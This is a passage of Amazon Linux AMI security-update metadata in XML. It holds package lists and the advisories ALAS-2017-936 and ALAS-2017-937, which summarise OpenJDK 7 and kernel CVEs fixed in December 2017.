release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/libsss_idmap-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd" version="1.15.2" release="50.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/sssd-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="python27-sss-murmur" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-murmur-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.15.2" release="50.34.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.15.2-50.34.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.15.2" release="50.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/libsss_simpleifp-devel-1.15.2-50.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-936</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-936: critical priority package update for java-1.7.0-openjdk</title><issued date="2017-12-20 19:02:00" /><updated date="2017-12-21 23:08:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-10388:
It was discovered that the Kerberos client implementation in the Libraries component of OpenJDK used the sname field from the plain text part rather than encrypted part of the KDC reply message. A man-in-the-middle attacker could possibly use this flaw to impersonate Kerberos services to Java applications acting as Kerberos clients.
1502038:
CVE-2017-10388 OpenJDK: use of unprotected sname in Kerberos client (Libraries, 8178794)
CVE-2017-10357:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502614:
CVE-2017-10357 OpenJDK: unbounded memory allocation in ObjectInputStream deserialization (Serialization, 8181597)
CVE-2017-10356:
It was discovered that the Security component of OpenJDK generated weak password-based encryption keys used to protect private keys stored in key stores. This made it easier to perform password guessing attacks to decrypt stored keys if an attacker could gain access to a key store.
1503169:
CVE-2017-10356 OpenJDK: weak protection of key stores against brute forcing (Security, 8181692)
CVE-2017-10355:
It was found that the FtpClient implementation in the Networking component of OpenJDK did not set connect and read timeouts by default. A malicious FTP server or a man-in-the-middle attacker could use this flaw to block execution of a Java application connecting to an FTP server.
1502869:
CVE-2017-10355 OpenJDK: no default network operations timeouts in FtpClient (Networking, 8181612)
CVE-2017-10350:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAX-WS). Supported versions that are affected are Java SE: 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502640:
CVE-2017-10350 OpenJDK: unbounded memory allocation in JAXWSExceptionBase deserialization (JAX-WS, 8181100)
CVE-2017-10349:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: JAXP). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502611:
CVE-2017-10349 OpenJDK: unbounded memory allocation in PredicatedNodeTest deserialization (JAXP, 8181327)
CVE-2017-10348:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502629:
CVE-2017-10348 OpenJDK: multiple unbounded memory allocations in deserialization (Libraries, 8181432)
CVE-2017-10347:
Vulnerability in the Java SE, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502632:
CVE-2017-10347 OpenJDK: unbounded memory allocation in SimpleTimeZone deserialization (Serialization, 8181323)
CVE-2017-10346:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501873:
CVE-2017-10346 OpenJDK: insufficient loader constraints checks for invokespecial (Hotspot, 8180711)
CVE-2017-10345:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 3.1 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L).
1502858:
CVE-2017-10345 OpenJDK: unbounded resource use in JceKeyStore deserialization (Serialization, 8181370)
CVE-2017-10295:
It was found that the HttpURLConnection and HttpsURLConnection classes in the Networking component of OpenJDK failed to check for newline characters embedded in URLs. An attacker able to make a Java application perform an HTTP request using an attacker-provided URL could possibly inject additional headers into the request.
1502687:
CVE-2017-10295 OpenJDK: HTTP client insufficient check for newline in URLs (Networking, 8176751)
CVE-2017-10285:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
1501868:
CVE-2017-10285 OpenJDK: incorrect privilege use when handling unreferenced objects (RMI, 8174966)
CVE-2017-10281:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Serialization). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9; Java SE Embedded: 8u144; JRockit: R28.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1502649:
CVE-2017-10281 OpenJDK: multiple unbounded memory allocations in deserialization (Serialization, 8174109)
CVE-2017-10274:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Smart Card IO). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE accessible data as well as unauthorized access to critical data or complete access to all Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).
1502053:
CVE-2017-10274 OpenJDK: CardImpl incorrect state handling (Smart Card IO, 8169026)
CVE-2017-10198:
It was discovered that the Security component of OpenJDK could fail to properly enforce restrictions defined for the processing of X.509 certificate chains. A remote attacker could possibly use this flaw to make Java accept a certificate that uses one of the disabled algorithms.
1472320:
CVE-2017-10198 OpenJDK: incorrect enforcement of certificate path restrictions (Security, 8179998)
CVE-2017-10193:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131; Java SE Embedded: 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1471715:
CVE-2017-10193 OpenJDK: incorrect key size constraint check (Security, 8179101)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10193" title="" id="CVE-2017-10193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10198" title="" id="CVE-2017-10198" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10274" title="" id="CVE-2017-10274" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10281" title="" id="CVE-2017-10281" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10285" title="" id="CVE-2017-10285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10295" title="" id="CVE-2017-10295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10345" title="" id="CVE-2017-10345" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10346" title="" id="CVE-2017-10346" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10347" title="" id="CVE-2017-10347" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10348" title="" id="CVE-2017-10348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10349" title="" id="CVE-2017-10349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10350" title="" id="CVE-2017-10350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10355" title="" id="CVE-2017-10355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10356" title="" id="CVE-2017-10356" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10357" title="" id="CVE-2017-10357" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10388" title="" id="CVE-2017-10388" type="cve" /></references><pkglist><collection 
short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.161-2.6.12.0.75.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.161-2.6.12.0.75.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package 
name="java-1.7.0-openjdk-demo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.161" release="2.6.12.0.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.161-2.6.12.0.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-937</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-937: important priority package update for kernel</title><issued date="2017-12-21 00:02:00" /><updated date="2017-12-21 23:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16994:
The walk_hugetlb_range() function in &#039;mm/pagewalk.c&#039; file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
1518155:
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
CVE-2017-16650:
The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.
1516265:
CVE-2017-16650 kernel: Divide-by-zero in drivers/net/usb/qmi_wwan.c
CVE-2017-16649:
The usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.
1516267:
CVE-2017-16649 kernel: Divide-by-zero in drivers/net/usb/cdc_ether.c
CVE-2017-16647:
drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.
1516270:
CVE-2017-16647 kernel: NULL pointer dereference in drivers/net/usb/asix_devices.c
CVE-2017-16646:
drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device.
1516272:
CVE-2017-16646 kernel: BUG in drivers/media/usb/dvb-usb/dib0700_devices.c
CVE-2017-16645:
The ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.
1516235:
CVE-2017-16645 kernel: Out-of-bounds read in drivers/input/misc/ims-pcu.c
CVE-2017-16643:
The parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device.
1516232:
CVE-2017-16643 kernel: Out-of-bounds read in drivers/input/tablet/gtco.c
CVE-2017-15115:
A vulnerability was found in the Linux kernel when peeling off an association to a socket in another network namespace. The transports in this association are not rehashed and keep using the old key in the hashtable; as a result, when the socket is closed and the transports are removed from the hashtable, all transports are freed. A later lookup of the association that dereferences these transports could then trigger a use-after-free.
1513345:
CVE-2017-15115 kernel: use-after-free in sctp_cmp_addr_exact
CVE-2017-1000407:
The Linux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest were to flood I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel, resulting in a DoS.
1520328:
CVE-2017-1000407 Kernel: KVM: DoS via write flood to I/O port 0x80
CVE-2017-1000405:
A flaw was found in the patches used to fix the &#039;dirtycow&#039; vulnerability (CVE-2016-5195). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages.
1516514:
CVE-2017-1000405 kernel: pmd can become dirty without going through a COW cycle
CVE-2017-0861:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0861" title="" id="CVE-2017-0861" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000405" title="" id="CVE-2017-1000405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000407" title="" id="CVE-2017-1000407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15115" title="" id="CVE-2017-15115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16643" title="" id="CVE-2017-16643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16645" title="" id="CVE-2017-16645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16646" title="" id="CVE-2017-16646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16647" title="" id="CVE-2017-16647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16649" title="" id="CVE-2017-16649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16650" title="" id="CVE-2017-16650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16994" title="" id="CVE-2017-16994" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel" 
version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.70-22.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.70" 
